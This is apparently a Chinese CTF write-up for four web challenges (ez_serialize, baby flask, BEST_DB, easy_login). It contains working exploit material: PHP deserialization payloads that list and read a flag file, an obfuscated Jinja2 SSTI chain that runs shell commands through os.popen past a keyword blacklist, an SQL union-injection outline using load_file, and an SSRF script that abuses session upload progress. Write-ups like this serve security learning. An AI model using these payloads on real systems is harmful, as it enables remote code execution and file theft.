ez_serialize
直接看源码
<?php
error_reporting(0);
highlight_file(__FILE__);
class A{
public $class;
public $para;
public $check;
public function __construct()
{
$this->class = "B";
$this->para = "ctfer";
echo new $this->class ($this->para);
}
public function __wakeup()
{
$this->check = new C;
if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
echo new $this->class ($this->para);
}
else
die('bad hacker~');
}
}
class B{
var $a;
public function __construct($a)
{
$this->a = $a;
echo ("hello ".$this->a);
}
}
class C{
function vaild($code){
$pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
if (preg_match($pattern, $code)){
return false;
}
else
return true;
}
}
if(isset($_GET['pop'])){
unserialize($_GET['pop']);
}
else{
$a=new A;
} hello ctfer
提示的很明显了 class调一个函数 para为参数 只是我不知道调什么函数。。。
echo new $this->class ($this->para);
用FilesystemIterator遍历目录
<?php
class A{
public $class='FilesystemIterator';
public $para="/var/www/html";
}
$o = new A();
echo serialize($o);
用SplFileObject读取文件
<?php
class A{
public $class='SplFileObject';
public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
}
$a = new A();
echo serialize($a);
baby flask
直接给出过滤的信息。。。限制的可真全啊
<!--
Hi young boy!</br>
Do you like ssti?</br>
blacklist</br>
'.','[','\'','"',''\\','+',':','_',</br>
'chr','pop','class','base','mro','init','globals','get',</br>
'eval','exec','os','popen','open','read',</br>
'select','url_for','get_flashed_messages','config','request',</br>
'count','length','0','1','2','3','4','5','6','7','8','9','0','1','2','3','4','5','6','7','8','9'</br>
</br>
-->
很轻松发现ssti点
这题应该是极其复杂的编码拼接(/(ㄒoㄒ)/~~
学到了利用过滤器
('__clas','s__')|join
dict(__clas=a,s__=b)|join
"__claee__"|replace("ee","ss")
贴一下别的师傅的wp
{% set id=dict(ind=a,ex=a)|join%}{% set pp=dict(po=a,p=a)|join%}{% set ls=dict(ls=a)|join%}{% set ppe=dict(po=a,pen=a)|join%}{% set gt=dict(ge=a,t=a)|join%}{% set cr=dict(ch=a,r=a)|join%}{% set nn=dict(n=a)|join%}{% set tt=dict(t=a)|join%}{% set ff=dict(f=a)|join%}{% set ooqq=dict(o=a,s=a)|join %}{% set rd=dict(re=a,ad=a)|join%}{% set five=(lipsum|string|list)|attr(id)(tt) %}{% set three=(lipsum|string|list)|attr(id)(nn) %}{% set one=(lipsum|string|list)|attr(id)(ff) %}{% set shiba=five*five-three-three-one %}{% set xiahuaxian=(lipsum|string|list)|attr(pp)(shiba) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glob=a,als=a)|join,xiahuaxian,xiahuaxian)|join %}{% set bin=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join %}{% set chcr=(lipsum|attr(gb))|attr(gt)(bin)|attr(gt)(cr) %}{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}{% set space=chcr(three*three*five-five-five-three) %}{% set shell=(ls,space,xiegang,dict(var=a)|join,xiegang,dict(www=a)|join,xiegang,dict(flask=a)|join)|join %}{{(lipsum|attr(gb))|attr(gt)(ooqq)|attr(ppe)(shell)|attr(rd)()}}
BEST_DB
很直白的一个sql注入
这题并没有过滤 " ,并且过滤的空格可以轻松用%20或/**/进行绕过
不过值得注意的是 直接在框框内输入并不会有回显 进行url编码后貌似就不可以了
直接用联合注入 爆库
得到flag.txt文件
用load_file()读取 /flag.txt文件即可
由于过滤了 / ,可以用编码绕过 但别忘了前面要加个 0x
一开始在load_file()里面加了个"" ,结果死活不对。。。
easy_login
<?php
if(!isset($_SESSION)){
highlight_file(__FILE__);
die("no session");
}
include("./php/check_ip.php");
error_reporting(0);
$url = $_GET['url'];
if(check_inner_ip($url)){
if($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
curl_close($ch);
}
}else{
echo "Your IP is internal yoyoyo";
}
?>
# -*- coding: utf-8 -*-
import requests
url = 'http://183.129.189.60:10015/?url=http://localhost/admin.php'
data = {'PHP_SESSION_UPLOAD_PROGRESS':'nmd'}
file = {'file':('r.txt')}
cookie = {'PHPSESSID':'nmd'}
r = requests.post(url=url, data=data, files=file, cookies=cookie)
print(r.text)
加入了PHP_SESSION_UPLOAD_PROGRESS 相当于session_start
可以参考buuctf中的 (PWN。。。)baby_ctf
几乎是一模一样 emmmm。。。有抄袭嫌疑